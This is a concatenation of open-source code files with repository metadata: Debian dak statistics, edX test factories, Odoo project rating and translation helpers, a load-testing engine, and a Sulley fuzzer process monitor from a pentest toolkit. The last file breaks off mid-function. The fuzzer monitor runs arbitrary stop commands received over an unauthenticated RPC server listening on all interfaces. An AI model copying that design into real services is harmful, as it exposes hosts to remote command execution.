            # Progress indicator: one dot per processed log file.
            stderr.write('.')
            stderr.flush()
    stderr.write('\n')
    stderr.flush()
    # Persist the updated counters and high-water mark for the next run.
    stats['timestamp'] = latest_timestamp
    with open(yaml, 'w') as fd:
        safe_dump(stats, fd)
################################################################################
def main ():
    # Parse the command line and dispatch to the requested statistics
    # mode; every usage error prints help and exits non-zero.
    global Cnf
    global users
    Cnf = utils.get_conf()
    Arguments = [('h',"help","Stats::Options::Help")]
    for i in [ "help" ]:
        if not Cnf.has_key("Stats::Options::%s" % (i)):
            Cnf["Stats::Options::%s" % (i)] = ""
    args = apt_pkg.parse_commandline(Cnf, Arguments, sys.argv)
    Options = Cnf.subtree("Stats::Options")
    if Options["Help"]:
        usage()
    if len(args) < 1:
        utils.warn("dak stats requires a MODE argument")
        usage(1)
    elif len(args) > 1:
        # Only 'new' legitimately takes a second argument (output file).
        if args[0].lower() != "new":
            utils.warn("dak stats accepts only one MODE argument")
            usage(1)
    elif args[0].lower() == "new":
        # Exactly one argument and it is 'new': the mandatory output
        # file is missing.
        utils.warn("new MODE requires an output file")
        usage(1)
    mode = args[0].lower()
    if mode == "arch-space":
        per_arch_space_use()
    elif mode == "pkg-nums":
        number_of_packages()
    elif mode == "daily-install":
        daily_install_stats()
    elif mode == "new":
        users = utils.get_users_from_ldap()
        new_stats(Cnf["Dir::Log"], args[1])
    else:
        utils.warn("unknown mode '%s'" % (mode))
        usage(1)
################################################################################
# Script entry point: dispatch to main() when executed directly.
if __name__ == '__main__':
    main()
| gpl-2.0 |
appsembler/edx-platform | lms/djangoapps/teams/tests/factories.py | 23 | 1230 | """Factories for testing the Teams API."""
from datetime import datetime
from uuid import uuid4
import factory
import pytz
from factory.django import DjangoModelFactory
from lms.djangoapps.teams.models import CourseTeam, CourseTeamMembership
LAST_ACTIVITY_AT = datetime(2015, 8, 15, 0, 0, 0, tzinfo=pytz.utc)
class CourseTeamFactory(DjangoModelFactory):
    """Factory for CourseTeams.

    Note that team_id is not auto-generated from name when using the factory.
    """
    class Meta(object):
        model = CourseTeam
        # Reuse an existing row when a team with the same team_id exists.
        django_get_or_create = ('team_id',)

    # Sequential ids/names: 'team-0', 'Awesome Team 0', ... per factory call.
    team_id = factory.Sequence('team-{0}'.format)
    # Random hex topic id per instance.
    discussion_topic_id = factory.LazyAttribute(lambda a: uuid4().hex)
    name = factory.Sequence("Awesome Team {0}".format)
    description = "A simple description"
    last_activity_at = LAST_ACTIVITY_AT
class CourseTeamMembershipFactory(DjangoModelFactory):
    """Factory for CourseTeamMemberships."""
    class Meta(object):
        model = CourseTeamMembership

    last_activity_at = LAST_ACTIVITY_AT

    @classmethod
    def _create(cls, model_class, *args, **kwargs):
        """Create the team membership. """
        # Bypass the default factory creation path and call save()
        # explicitly — presumably so the model's save()-time side effects
        # run; confirm against CourseTeamMembership.save().
        obj = model_class(*args, **kwargs)
        obj.save()
        return obj
| agpl-3.0 |
sysadminmatmoz/OCB | addons/rating_project_issue/models/project_issue.py | 51 | 5818 | # -*- coding: utf-8 -*-
from openerp import api, fields, models
class ProjectIssue(models.Model):
    _name = "project.issue"
    # Mix the rating machinery into project issues.
    _inherit = ['project.issue', 'rating.mixin']

    @api.multi
    def write(self, values):
        # When an issue moves to a stage that carries a rating mail
        # template, ask the issue's customer to rate the assignee.
        if 'stage_id' in values and values.get('stage_id'):
            template = self.env['project.task.type'].browse(values.get('stage_id')).rating_template_id
            if template:
                # NOTE(review): reads self.user_id/partner_id directly —
                # presumably write() is called on single records here;
                # confirm behaviour for multi-record recordsets.
                rated_partner_id = self.user_id.partner_id
                partner_id = self.partner_id
                if partner_id and rated_partner_id:
                    self.rating_send_request(template, partner_id, rated_partner_id)
        return super(ProjectIssue, self).write(values)
class Project(models.Model):
    _inherit = "project.project"

    @api.multi
    @api.depends('percentage_satisfaction_task', 'percentage_satisfaction_issue')
    def _compute_percentage_satisfaction_project(self):
        # Combine the task and issue satisfaction percentages into one
        # project-level figure, weighted by the number of ratings each
        # side received; -1 means "no ratings yet".
        super(Project, self)._compute_percentage_satisfaction_project()
        Rating = self.env['rating.rating']
        Issue = self.env['project.issue']
        for record in self.filtered(lambda record: record.use_tasks or record.use_issues):
            if record.use_tasks or record.use_issues:
                # built the domain according the project parameters (use tasks and/or issues)
                res_models = []
                domain = []
                if record.use_tasks:
                    res_models.append('project.task')
                    domain += ['&', ('res_model', '=', 'project.task'), ('res_id', 'in', record.tasks.ids)]
                if record.use_issues:
                    # TODO: if performance issue, compute the satisfaction with a custom request joining rating and task/issue.
                    issues = Issue.search([('project_id', '=', record.id)])
                    res_models.append('project.issue')
                    domain += ['&', ('res_model', '=', 'project.issue'), ('res_id', 'in', issues.ids)]
                # Prefix-notation domain: OR the two branches when both
                # tasks and issues are enabled, then AND in (rating >= 0).
                if len(res_models) == 2:
                    domain = ['|'] + domain
                domain = ['&', ('rating', '>=', 0)] + domain
                # get the number of rated tasks and issues with a read_group (more perfomant !)
                grouped_data = Rating.read_group(domain, ['res_model'], ['res_model'])
                # compute the number of each model and total number
                res = dict.fromkeys(res_models, 0)
                for data in grouped_data:
                    res[data['res_model']] += data['res_model_count']
                nbr_rated_task = res.get('project.task', 0)
                nbr_rated_issue = res.get('project.issue', 0)
                nbr_project_rating = nbr_rated_issue + nbr_rated_task
                # compute the weighted arithmetic average
                ratio_task = float(nbr_rated_task) / float(nbr_project_rating) if nbr_project_rating else 0
                ratio_issue = float(nbr_rated_issue) / float(nbr_project_rating) if nbr_project_rating else 0
                record.percentage_satisfaction_project = round((ratio_task*record.percentage_satisfaction_task)+(ratio_issue*record.percentage_satisfaction_issue)) if nbr_project_rating else -1
            else:
                record.percentage_satisfaction_project = -1

    @api.one
    @api.depends('issue_ids.rating_ids.rating')
    def _compute_percentage_satisfaction_issue(self):
        # Percentage of 'great' grades among all issue ratings; -1 when
        # the project has no rated issues at all.
        project_issue = self.env['project.issue'].search([('project_id', '=', self.id)])
        activity = project_issue.rating_get_grades()
        self.percentage_satisfaction_issue = activity['great'] * 100 / sum(activity.values()) if sum(activity.values()) else -1

    # Stored computed field shown as '% Happy' on the project.
    percentage_satisfaction_issue = fields.Integer(compute='_compute_percentage_satisfaction_issue', string='% Happy', store=True, default=-1)

    @api.multi
    def action_view_issue_rating(self):
        """ return the action to see all the rating about the issues of the project """
        action = self.env['ir.actions.act_window'].for_xml_id('rating', 'action_view_rating')
        issues = self.env['project.issue'].search([('project_id', 'in', self.ids)])
        return dict(action, domain=[('res_id', 'in', issues.ids), ('res_model', '=', 'project.issue')])

    @api.multi
    def action_view_all_rating(self):
        # Extend the parent action's domain with the issue ratings of
        # this project; same prefix-notation domain assembly as above.
        action = super(Project, self).action_view_all_rating()
        task_domain = action['domain'][1:] # remove the (rating != -1) condition
        domain = []
        if self.use_tasks: # add task domain, if neeeded
            domain = ['&'] + task_domain
        if self.use_issues: # add issue domain if needed
            issues = self.env['project.issue'].search([('project_id', 'in', self.ids)])
            domain = domain + ['&', ('res_id', 'in', issues.ids), ('res_model', '=', 'project.issue')]
        if self.use_tasks and self.use_issues:
            domain = ['|'] + domain
        domain = [('rating', '!=', -1)] + domain # prepend the condition to avoid empty rating
        return dict(action, domain=domain)
class Rating(models.Model):
    _inherit = "rating.rating"

    @api.model
    def apply_rating(self, rate, res_model=None, res_id=None, token=None):
        """ check if the auto_validation_kanban_state is activated. If so, apply the modification of the
            kanban state according to the given rating.
        """
        rating = super(Rating, self).apply_rating(rate, res_model, res_id, token)
        if rating.res_model == 'project.issue':
            # sudo(): the rater is usually a portal/public user without
            # write access to the issue.
            issue = self.env[rating.res_model].sudo().browse(rating.res_id)
            if issue.stage_id.auto_validation_kanban_state:
                # Ratings above 5 validate the issue, lower ones block it
                # (presumably a 0-10 scale — confirm against rating.mixin).
                if rating.rating > 5:
                    issue.write({'kanban_state' : 'done'})
                else:
                    issue.write({'kanban_state' : 'blocked'})
        return rating
| agpl-3.0 |
firebitsbr/raspberry_pwn | src/pentest/voiper/sulley/nix_process_monitor.py | 8 | 9347 | import os
import sys
import getopt
import signal
import time
import threading
from sulley import pedrpc
'''
By nnp
http://www.unprotectedhex.com
This intended as a basic replacement for Sulley's process_monitor.py on *nix.
The below options are accepted. Crash details are limited to the signal that
caused the death and whatever operating system supported mechanism is in place (i.e
core dumps)
Replicated methods:
- alive
- log
- post_send
- pre_send
- start_target
- stop_target
- set_start_commands
- set_stop_commands
Limitations
- Cannot attach to an already running process
- Currently only accepts one start_command
- Limited 'crash binning'. Relies on the availability of core dumps. These
should be created in the same directory the process is ran from on Linux
and in the (hidden) /cores directory on OS X. On OS X you have to add
the option COREDUMPS=-YES- to /etc/hostconfig and then `ulimit -c
unlimited` as far as I know. A restart may be required. The file
specified by crash_bin will any other available details such as the test
that caused the crash and the signal received by the program
'''
USAGE = "USAGE: process_monitor.py"\
"\n [-c|--crash_bin] File to record crash info too" \
"\n [-P|--port PORT] TCP port to bind this agent too"\
"\n [-l|--log_level LEVEL] log level (default 1), increase for more verbosity" \
"\n [-t|--timeout timeout] amount of time to give an application to settle in after a restart"
ERR = lambda msg: sys.stderr.write("ERR> " + msg + "\n") or sys.exit(1)
class debugger_thread:
    '''
    Not actually run as a thread itself: only start_monitoring() is.
    Wraps spawning/killing a target process and reporting how it exited.
    '''
    def __init__(self, start_command):
        '''
        @type start_command: String
        @param start_command: Full command line to spawn; split naively
            on single spaces (no shell quoting support).
        '''
        self.start_command = start_command
        self.tokens = start_command.split(' ')
        self.cmd_args = []        # kept for interface compatibility; unused
        self.pid = None           # pid of the spawned target, once running
        self.exit_status = None   # raw waitpid() status word after death
        self.alive = False

    def spawn_target(self):
        '''Fork/exec the target without waiting for it to finish.'''
        # Fix: removed stray debug "print self.tokens" that leaked the
        # command line to stdout on every spawn.
        self.pid = os.spawnv(os.P_NOWAIT, self.tokens[0], self.tokens)
        self.alive = True

    def start_monitoring(self):
        '''Block in waitpid() until the target dies (run in a thread).'''
        # waitpid() returns (pid, status); keep only the status word.
        self.exit_status = os.waitpid(self.pid, 0)[1]
        self.alive = False

    def get_exit_status(self):
        '''Return the raw exit status word, or None while still running.'''
        return self.exit_status

    def stop_target(self):
        '''Forcibly kill the target with SIGKILL.'''
        os.kill(self.pid, signal.SIGKILL)
        self.alive = False

    def isAlive(self):
        '''Return True while the spawned target has not been reaped.'''
        return self.alive
########################################################################################################################
class nix_process_monitor_pedrpc_server(pedrpc.server):
    def __init__(self, host, port, crash_bin, log_level=1, timeout=5):
        '''
        @type host: String
        @param host: Hostname or IP address
        @type port: Integer
        @param port: Port to bind server to
        @type timeout: Integer
        @param timeout: Time to give the application to settle in after a restart
        '''
        pedrpc.server.__init__(self, host, port)
        self.crash_bin = crash_bin   # file crash synopses are appended to
        self.log_level = log_level
        self.dbg = None              # debugger_thread wrapper, created on first pre_send()
        self.timeout = timeout
        self.log("Process Monitor PED-RPC server initialized:")
        self.log("Listening on %s:%s" % (host, port))
        self.log("awaiting requests...")

    def alive (self):
        '''
        Returns True. Useful for PED-RPC clients who want to see if the PED-RPC connection is still alive.
        '''
        return True

    def log (self, msg="", level=1):
        '''
        If the supplied message falls under the current log level, print the specified message to screen.

        @type msg: String
        @param msg: Message to log
        '''
        if self.log_level >= level:
            print "[%s] %s" % (time.strftime("%I:%M.%S"), msg)

    def post_send (self):
        '''
        This routine is called after the fuzzer transmits a test case and returns the status of the target.

        @rtype: Boolean
        @return: Return True if the target is still active, False otherwise.
        '''
        # NOTE(review): despite the docstring, this returns a tuple of
        # (alive, reason) — confirm callers expect the pair.
        reason = ''
        if not self.dbg.isAlive():
            exit_status = self.dbg.get_exit_status()
            rec_file = open(self.crash_bin, 'a')
            # Classify the death from the raw waitpid() status word.
            # NOTE(review): WCOREDUMP is tested first and labelled
            # 'Segmentation fault', but any core-dumping signal (SIGABRT,
            # SIGBUS, ...) lands here as well — confirm intent.
            if os.WCOREDUMP(exit_status):
                reason = 'Segmentation fault'
            elif os.WIFSTOPPED(exit_status):
                reason = 'Stopped with signal ' + str(os.WTERMSIG(exit_status))
            elif os.WIFSIGNALED(exit_status):
                reason = 'Terminated with signal ' + str(os.WTERMSIG(exit_status))
            elif os.WIFEXITED(exit_status):
                reason = 'Exit with code - ' + str(os.WEXITSTATUS(exit_status))
            else:
                reason = 'Process died for unknown reason'
            self.last_synopsis = '[%s] Crash : Test - %d Reason - %s\n' % (time.strftime("%I:%M.%S"), self.test_number, reason)
            rec_file.write(self.last_synopsis)
            rec_file.close()

        return (self.dbg.isAlive(), reason)

    def pre_send (self, test_number):
        '''
        This routine is called before the fuzzer transmits a test case and ensure the debugger thread is operational. In the case
        of the *nix process monitor and operational debugger thread == a running target program

        @type test_number: Integer
        @param test_number: Test number to retrieve PCAP for.
        '''
        # Lazily (re)start the target: on the very first call and after
        # every observed crash/exit.
        if self.dbg == None:
            self.start_target()

        self.log("pre_send(%d)" % test_number, 10)
        self.test_number = test_number
        if not self.dbg or not self.dbg.isAlive():
            self.start_target()

    def start_target (self):
        '''
        Start up the target process by issuing the commands in self.start_commands.
        '''
        self.log("starting target process")
        # Only a single start command is supported (see set_start_commands).
        self.dbg = debugger_thread(self.start_commands[0])
        self.dbg.spawn_target()
        # prevent blocking by spawning off another thread to waitpid
        threading.Thread(target=self.dbg.start_monitoring).start()
        self.log("done. target up and running, giving it %d seconds to settle in." % self.timeout)
        time.sleep(self.timeout)

    def stop_target (self):
        '''
        Kill the current debugger thread and stop the target process by issuing the commands in self.stop_commands.
        '''
        # give the debugger thread a chance to exit.
        time.sleep(1)

        self.log("stopping target process")

        for command in self.stop_commands:
            if command == "TERMINATE_PID":
                # Magic token: SIGKILL the tracked pid instead of running
                # a shell command.
                self.dbg.stop_target()
            else:
                os.system(command)

##        time.sleep(2)
##        # just in case
##        try:
##            self.dbg.stop_target()
##        except:
##            pass

    def set_start_commands (self, start_commands):
        '''
        We expect start_commands to be a list with one element for example
        ['/usr/bin/program arg1 arg2 arg3']
        '''
        if len(start_commands) > 1:
            self.log("This process monitor does not accept > 1 start command")
            return

        self.log("updating start commands to: %s" % start_commands)
        self.start_commands = start_commands

    def set_stop_commands (self, stop_commands):
        self.log("updating stop commands to: %s" % stop_commands)
        self.stop_commands = stop_commands

    def set_proc_name (self, proc_name):
        self.log("updating target process name to '%s'" % proc_name)
        self.proc_name = proc_name

    def get_crash_synopsis (self):
        '''
        Return the last recorded crash synopsis.

        @rtype: String
        @return: Synopsis of last recorded crash.
        '''
        return self.last_synopsis
########################################################################################################################
if __name__ == "__main__":
# parse command line options.
try:
opts, args = getopt.getopt(sys.argv[1:], "c:P:l:t:", ["crash_bin=","port=","log_level=", "timeout="])
except getopt.GetoptError:
ERR(USAGE)
log_level = 1
PORT = None
crash_bin = None
timeout = 5
for opt, arg in opts:
if opt in ("-c", "--crash_bin"): crash_bin = arg
if opt in ("-P", "--port"): PORT = int(arg)
if opt in ("-l", "--log_level"): log_level = int(arg)
if opt in ("-t", "--timeout"): timeout = int(arg)
if crash_bin == None: ERR(USAGE)
if PORT == None:
PORT = 26002
# spawn the PED-RPC servlet.
servlet = nix_process_monitor_pedrpc_server("0.0.0.0", PORT, crash_bin, log_level, timeout)
servlet.serve_forever()
| gpl-3.0 |
shakhat/act | act/engine/core.py | 1 | 7144 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import random
import re
import time
from oslo_log import log as logging
from oslo_utils import timeutils
import rq
from act.engine import consts
from act.engine import item as item_pkg
from act.engine import metrics
from act.engine import registry
from act.engine import utils
from act.engine import world as world_pkg
LOG = logging.getLogger(__name__)
Task = collections.namedtuple('Task', ['id', 'action', 'items'])
NoOpTask = Task(id=0, action=None, items=None)
def produce_task(world, actions):
    # Pick one runnable action at random (weighted) and reserve one world
    # item of each required type for it; returns a Task, or None when no
    # action can currently run.
    available_action_items = {}  # action -> (items)

    for action in actions:
        item_types = action.get_depends_on()
        world_items = world.filter_items(item_types)
        filtered_items = list(action.filter_items(world_items))
        if not filtered_items:
            continue

        # LOG.debug('Available action: %s, item-types: %s, filtered_items: %s',
        #           action, item_types, filtered_items)

        # check that filtered_items contain items of *all* item_types
        filtered_item_types = set(i.item_type for i in filtered_items)
        if item_types and filtered_item_types != item_types:
            continue

        available_action_items[action] = filtered_items

    if available_action_items:
        available_actions = list(available_action_items.keys())
        chosen_action = utils.weighted_random_choice(available_actions)
        available_items = available_action_items[chosen_action]

        # pick one random item per type
        items_per_type = collections.defaultdict(list)
        for item in available_items:
            items_per_type[item.item_type].append(item)
        chosen_items = [random.choice(v) for v in items_per_type.values()]

        # Reserve before returning so a concurrent producer cannot hand
        # the same items to another task.
        chosen_action.reserve_items(chosen_items)

        task = Task(id=utils.make_id(), action=chosen_action,
                    items=chosen_items)
        LOG.info('Produced task: %s', task)
        return task
    else:
        LOG.debug('No actions available')
        return None
def handle_operation(op, world):
    # handles a specific operation on the world
    # (each operation knows how to apply itself; see op.do())
    LOG.info('Handle: %s', op)
    op.do(world)
def do_action(task):
    # does real action inside worker processes (executed via rq);
    # returns the resulting world-mutating operation for the main loop.
    LOG.info('Executing action %s', task)
    action = task.action
    operation = action.do_action(items=task.items, task_id=task.id)
    LOG.info('Operation %s', operation)
    return operation
def apply_action_filter(action_filter):
    """Yield registered actions whose name matches *action_filter*.

    :param action_filter: regular expression matched (via re.match)
        against str(action); a falsy value disables filtering and every
        registered action is yielded.
    """
    # A single pass replaces the original duplicated if/else loops: an
    # empty/None filter short-circuits to "accept everything".
    for action in registry.get_actions():
        if not action_filter or re.match(action_filter, str(action)):
            yield action
def apply_limits_filter(limits, actions, actions_counter):
    """Yield actions that have not yet reached their configured limit.

    Actions with no entry in *limits* are always passed through;
    limited ones are yielded only while their execution count stays
    below the limit.
    """
    for candidate in actions:
        key = str(candidate)
        unlimited = key not in limits
        # Short-circuit keeps the counter lookup off the unlimited path,
        # matching the original two-branch behaviour exactly.
        if unlimited or actions_counter[key] < limits[key]:
            yield candidate
def process(scenario, interval):
    """Run a scenario: the engine entry point.

    Plays each stage of scenario['play'] in order, keeping up to the
    stage's `concurrency` tasks in flight via the rq task queue, applying
    finished operations to the world and publishing metrics; a synthetic
    tear-down stage is appended so outstanding tasks drain at the end.

    :param scenario: parsed scenario dict ('title', 'play', optional
        'global' section with limits).
    :param interval: seconds to sleep between scheduling iterations.
    """
    registry.init()
    metrics.clear()

    # initialize the world with the single root item everything hangs off
    default_items = [item_pkg.Item('root')]
    world = world_pkg.World()
    for item in default_items:
        world.put(item)

    # global section: scenario-wide limits, plus per-action defaults
    # declared by the actions themselves (renamed from `globals`, which
    # shadowed the builtin).
    global_section = scenario.get('global') or {}
    global_limits = global_section['limits'] if 'limits' in global_section else {}
    for action in registry.get_actions():
        limit = action.get_limit()
        if limit:
            global_limits[str(action)] = limit

    # play!
    play = scenario['play']
    LOG.info('Playing scenario "%s"', scenario['title'])

    # add tear down: zero concurrency lets in-flight tasks drain
    play.append(dict(concurrency=0, duration=1000, title='tear down'))

    task_results = []
    task_queue = rq.Queue(consts.TASK_QUEUE_NAME)
    failed_queue = rq.Queue(consts.FAILURE_QUEUE_NAME)
    failed_queue.empty()
    metrics.set_metric(metrics.METRIC_TYPE_SUMMARY, 'failures', 0,
                       mood=metrics.MOOD_HAPPY)
    failures = 0
    counter = 0  # total operations applied to the world
    actions_counter = collections.defaultdict(int)

    for idx, stage in enumerate(play):
        title = stage.get('title') or ('stage #%s' % idx)
        duration = stage['duration']
        concurrency = stage['concurrency']
        LOG.info('Playing stage "%s" duration: %s, concurrency: %s',
                 title, duration, concurrency)
        limits = stage.get('limits') or {}
        limits.update(global_limits)

        watch = timeutils.StopWatch(duration=duration)
        watch.start()

        while not watch.expired():
            # collect finished tasks and apply their operations
            pending = []
            for task_result in task_results:
                operation = task_result.return_value
                if operation is None:
                    pending.append(task_result)
                else:
                    handle_operation(operation, world)
                    counter += 1
                    metrics.set_metric(metrics.METRIC_TYPE_SUMMARY,
                                       'operation', counter)

            addition = concurrency - len(pending)
            if addition > 0:  # need to add more tasks
                for i in range(addition):
                    actions = apply_action_filter(stage.get('filter'))
                    actions = apply_limits_filter(limits, actions,
                                                  actions_counter)
                    next_task = produce_task(world, actions)
                    if not next_task:
                        break  # no more actions possible
                    pending.append(task_queue.enqueue(do_action, next_task))
                    actions_counter[str(next_task.action)] += 1

            task_results = pending

            if len(failed_queue) > failures:
                failures = len(failed_queue)
                metrics.set_metric(metrics.METRIC_TYPE_SUMMARY, 'failures',
                                   failures, mood=metrics.MOOD_SAD)
            metrics.set_metric(metrics.METRIC_TYPE_SUMMARY, 'backlog',
                               len(task_results))
            # Fix: these loop variables were previously named `counter`,
            # which clobbered the operations counter above and corrupted
            # the 'operation' metric after the first metrics pass.
            for action, action_count in actions_counter.items():
                metrics.set_metric(metrics.METRIC_TYPE_ACTIONS, action,
                                   action_count)
            for item_type, item_count in world.get_counters().items():
                metrics.set_metric(metrics.METRIC_TYPE_OBJECTS, item_type,
                                   item_count)

            if len(task_results) == 0:  # no existing tasks and no to add
                break  # tear down finished
            time.sleep(interval)

    LOG.info('World: %s', world)
| apache-2.0 |
hubsaysnuaa/odoo | openerp/tools/translate.py | 27 | 45371 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import codecs
import csv
import fnmatch
import inspect
import locale
import os
import openerp.sql_db as sql_db
import re
import logging
import tarfile
import tempfile
import threading
from babel.messages import extract
from collections import defaultdict
from datetime import datetime
from lxml import etree
from os.path import join
import config
import misc
from misc import SKIPPED_ELEMENT_TYPES
import osutil
import openerp
from openerp import SUPERUSER_ID
_logger = logging.getLogger(__name__)

# used to notify web client that these translations should be loaded in the UI
WEB_TRANSLATION_COMMENT = "openerp-web"

# XML tags whose text content is never extracted as translatable
# (see trans_parse_view and _extract_translatable_qweb_terms)
SKIPPED_ELEMENTS = ('script', 'style')
# Mapping from POSIX locale codes to the Windows locale names that
# ``locale.setlocale`` expects on that platform (used by get_locales() when
# os.name == 'nt'). Regional variants without a dedicated Windows entry fall
# back to the main language locale (e.g. all fr_* map to French_France).
_LOCALE2WIN32 = {
    'af_ZA': 'Afrikaans_South Africa',
    'sq_AL': 'Albanian_Albania',
    'ar_SA': 'Arabic_Saudi Arabia',
    'eu_ES': 'Basque_Spain',
    'be_BY': 'Belarusian_Belarus',
    'bs_BA': 'Bosnian_Bosnia and Herzegovina',
    'bg_BG': 'Bulgarian_Bulgaria',
    'ca_ES': 'Catalan_Spain',
    'hr_HR': 'Croatian_Croatia',
    'zh_CN': 'Chinese_China',
    'zh_TW': 'Chinese_Taiwan',
    'cs_CZ': 'Czech_Czech Republic',
    'da_DK': 'Danish_Denmark',
    'nl_NL': 'Dutch_Netherlands',
    'et_EE': 'Estonian_Estonia',
    'fa_IR': 'Farsi_Iran',
    'ph_PH': 'Filipino_Philippines',
    'fi_FI': 'Finnish_Finland',
    'fr_FR': 'French_France',
    'fr_BE': 'French_France',
    'fr_CH': 'French_France',
    'fr_CA': 'French_France',
    'ga': 'Scottish Gaelic',
    'gl_ES': 'Galician_Spain',
    'ka_GE': 'Georgian_Georgia',
    'de_DE': 'German_Germany',
    'el_GR': 'Greek_Greece',
    'gu': 'Gujarati_India',
    'he_IL': 'Hebrew_Israel',
    'hi_IN': 'Hindi',
    'hu': 'Hungarian_Hungary',
    'is_IS': 'Icelandic_Iceland',
    'id_ID': 'Indonesian_indonesia',
    'it_IT': 'Italian_Italy',
    'ja_JP': 'Japanese_Japan',
    'kn_IN': 'Kannada',
    'km_KH': 'Khmer',
    'ko_KR': 'Korean_Korea',
    'lo_LA': 'Lao_Laos',
    'lt_LT': 'Lithuanian_Lithuania',
    'lat': 'Latvian_Latvia',
    'ml_IN': 'Malayalam_India',
    'mi_NZ': 'Maori',
    'mn': 'Cyrillic_Mongolian',
    'no_NO': 'Norwegian_Norway',
    'nn_NO': 'Norwegian-Nynorsk_Norway',
    'pl': 'Polish_Poland',
    'pt_PT': 'Portuguese_Portugal',
    'pt_BR': 'Portuguese_Brazil',
    'ro_RO': 'Romanian_Romania',
    'ru_RU': 'Russian_Russia',
    'sr_CS': 'Serbian (Cyrillic)_Serbia and Montenegro',
    'sk_SK': 'Slovak_Slovakia',
    'sl_SI': 'Slovenian_Slovenia',
    #should find more specific locales for spanish countries,
    #but better than nothing
    'es_AR': 'Spanish_Spain',
    'es_BO': 'Spanish_Spain',
    'es_CL': 'Spanish_Spain',
    'es_CO': 'Spanish_Spain',
    'es_CR': 'Spanish_Spain',
    'es_DO': 'Spanish_Spain',
    'es_EC': 'Spanish_Spain',
    'es_ES': 'Spanish_Spain',
    'es_GT': 'Spanish_Spain',
    'es_HN': 'Spanish_Spain',
    'es_MX': 'Spanish_Spain',
    'es_NI': 'Spanish_Spain',
    'es_PA': 'Spanish_Spain',
    'es_PE': 'Spanish_Spain',
    'es_PR': 'Spanish_Spain',
    'es_PY': 'Spanish_Spain',
    'es_SV': 'Spanish_Spain',
    'es_UY': 'Spanish_Spain',
    'es_VE': 'Spanish_Spain',
    'sv_SE': 'Swedish_Sweden',
    'ta_IN': 'English_Australia',  # NOTE(review): Tamil mapped to English_Australia -- looks wrong, confirm intent
    'th_TH': 'Thai_Thailand',
    'tr_TR': 'Turkish_Turkey',
    'uk_UA': 'Ukrainian_Ukraine',
    'vi_VN': 'Vietnamese_Viet Nam',
    'tlh_TLH': 'Klingon',
}
# These are not all english small words, just those that could potentially be isolated within views
ENGLISH_SMALL_WORDS = set("as at by do go if in me no of ok on or to up us we".split())

class UNIX_LINE_TERMINATOR(csv.excel):
    """csv dialect identical to 'excel' except for Unix-style line endings."""
    lineterminator = '\n'

csv.register_dialect("UNIX", UNIX_LINE_TERMINATOR)
#
# Warning: better use self.pool.get('ir.translation')._get_source if you can
#
def translate(cr, name, source_type, lang, source=None):
    """Fetch one translated value straight from ``ir_translation``.

    :param cr: database cursor
    :param name: qualified resource name the term is attached to (optional)
    :param source_type: translation type ('code', 'model', 'view', ...)
    :param lang: target language code, e.g. 'fr_FR'
    :param source: original (untranslated) term used to narrow the lookup
    :return: the translated value, or False when nothing matches
    """
    base = 'select value from ir_translation where lang=%s and type=%s'
    if source and name:
        cr.execute(base + ' and name=%s and src=%s',
                   (lang, source_type, str(name), source))
    elif name:
        cr.execute(base + ' and name=%s', (lang, source_type, str(name)))
    elif source:
        cr.execute(base + ' and src=%s', (lang, source_type, source))
    row = cr.fetchone()
    # empty/None values are normalized to False, like the historical behavior
    return (row and row[0]) or False
class GettextAlias(object):
    """Callable alias (bound to ``_`` below) translating a source string.

    It inspects the *caller's* stack frame to discover a database cursor
    and the active language, then resolves the term through
    ``ir.translation``. Any failure falls back to returning the original
    source string, so ``_('...')`` is always safe to call.
    """

    def _get_db(self):
        # find current DB based on thread/worker db name (see netsvc)
        db_name = getattr(threading.currentThread(), 'dbname', None)
        if db_name:
            return sql_db.db_connect(db_name)

    def _get_cr(self, frame, allow_create=True):
        """Return ``(cursor, is_new_cursor)`` found from the caller's frame."""
        # try, in order: cr, cursor, self.env.cr, self.cr,
        # request.env.cr
        if 'cr' in frame.f_locals:
            return frame.f_locals['cr'], False
        if 'cursor' in frame.f_locals:
            return frame.f_locals['cursor'], False
        s = frame.f_locals.get('self')
        if hasattr(s, 'env'):
            return s.env.cr, False
        if hasattr(s, 'cr'):
            return s.cr, False
        try:
            from openerp.http import request
            return request.env.cr, False
        except RuntimeError:
            # no HTTP request bound to the current thread
            pass
        if allow_create:
            # create a new cursor
            db = self._get_db()
            if db is not None:
                return db.cursor(), True
        return None, False

    def _get_uid(self, frame):
        """Best-effort lookup of the acting user id in the caller's frame."""
        # try, in order: uid, user, self.env.uid
        if 'uid' in frame.f_locals:
            return frame.f_locals['uid']
        if 'user' in frame.f_locals:
            return int(frame.f_locals['user'])      # user may be a record
        s = frame.f_locals.get('self')
        return s.env.uid

    def _get_lang(self, frame):
        """Best-effort lookup of the active language code, or None."""
        # try, in order: context.get('lang'), kwargs['context'].get('lang'),
        # self.env.lang, self.localcontext.get('lang'), request.env.lang
        lang = None
        if frame.f_locals.get('context'):
            lang = frame.f_locals['context'].get('lang')
        if not lang:
            kwargs = frame.f_locals.get('kwargs', {})
            if kwargs.get('context'):
                lang = kwargs['context'].get('lang')
        if not lang:
            s = frame.f_locals.get('self')
            if hasattr(s, 'env'):
                lang = s.env.lang
            if not lang:
                if hasattr(s, 'localcontext'):
                    lang = s.localcontext.get('lang')
            if not lang:
                try:
                    from openerp.http import request
                    lang = request.env.lang
                except RuntimeError:
                    pass
            if not lang:
                # Last resort: attempt to guess the language of the user
                # Pitfall: some operations are performed in sudo mode, and we
                #          don't know the originial uid, so the language may
                #          be wrong when the admin language differs.
                pool = getattr(s, 'pool', None)
                (cr, dummy) = self._get_cr(frame, allow_create=False)
                uid = self._get_uid(frame)
                if pool and cr and uid:
